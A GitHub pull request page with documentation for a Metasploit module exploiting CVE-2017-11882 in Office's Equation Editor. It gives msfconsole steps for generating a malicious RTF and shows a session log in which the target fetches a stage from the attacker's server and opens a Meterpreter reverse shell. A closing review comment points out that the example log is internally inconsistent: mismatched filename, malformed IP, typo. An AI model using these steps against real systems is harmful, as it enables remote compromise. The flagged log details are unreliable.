CVE-2017-11882 Microsoft Office Memory Corruption #9226

merged 12 commits into from Dec 5, 2017
@@ -0,0 +1,53 @@

Module exploits a flaw in how the Equation Editor that allows an attacker to execute arbitrary code in RTF files without interaction. The vulnerability is caused by the Equation Editor, to which fails to properly handle OLE objects in memory.

## Vulnerable Application

- Microsoft Office 2016
- Microsoft Office 2013 Service Pack 1
- Microsoft Office 2010 Service Pack 2
- Microsoft Office 2007

## Verification Steps

1. Start msfconsole
2. Do: `use exploit/windows/fileformat/office_ms17_11882`
3. Do: `set PAYLOAD [PAYLOAD]`
4. Do: `run`

## Options
### FILENAME
Filename to output, and location to which should be written.


## Example

```
msf > use exploit/windows/fileformat/office_ms17_11882
msf exploit(office_ms17_11882) > set FILENAME msf.rtf
FILENAME => /home/mumbai/file.rtf
msf exploit(office_ms17_11882) > set LHOST ens3
LHOST => ens3
msf exploit(office_ms17_11882) > set LPORT 35116
LPORT => 35116
msf exploit(office_ms17_11882) > run
[*] Using URL: http://0.0.0.0:8080/BUY0DYgc
[*] Local IP: http://192.1668.0.11:8080/BUY0DYgc
[*] Server started.
[*] 192.168.0.24 office_ms17_11882 - Handling initial request from 192.168.0.24
[*] 192.168.0.24 office_ms17_11882 - Stage two requestd, sending
[*] Sending stage (205379 bytes) to 192.168.0.24
[*] Meterpreter session 1 opened (192.168.0.11:35116 -> 192.168.0.24:52217) at 2017-11-21 14:41:59 -0500
sessions -i 1
[*] Starting interaction with 1...

meterpreter > sysinfo
Computer : TEST-PC
OS : Windows 7 (Build 7601, Service Pack 1).
Architecture : x64
System Language : en_US
Domain : WORKGROUP
Logged On Users : 1
Meterpreter : x64/windows
meterpreter >
```
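Review bot: The example session is internally inconsistent, so it cannot have been pasted from a single run. `set FILENAME msf.rtf` is echoed as `FILENAME => /home/mumbai/file.rtf`, and `[*] Local IP: http://192.1668.0.11:8080/BUY0DYgc` contains a malformed address while the session line shows `192.168.0.11`; please replace it with an unedited transcript (and fix `requestd` in the stage-two line). The Options section documents only FILENAME, yet the example sets LHOST and LPORT and the output shows the module starting an HTTP server (`Using URL: http://0.0.0.0:8080/...`), so the payload handler options and the server options (SRVHOST, SRVPORT and URIPATH if this module uses the standard HttpServer mixin) should be listed too, and Verification Steps should include setting LHOST and opening the generated file on the target before the session appears. The opening description also needs rewording: "a flaw in how the Equation Editor that allows" and "to which fails to properly handle" are not grammatical; something like "a flaw in Equation Editor, which fails to properly handle OLE objects in memory, allowing code execution when a crafted RTF file is opened" reads cleanly.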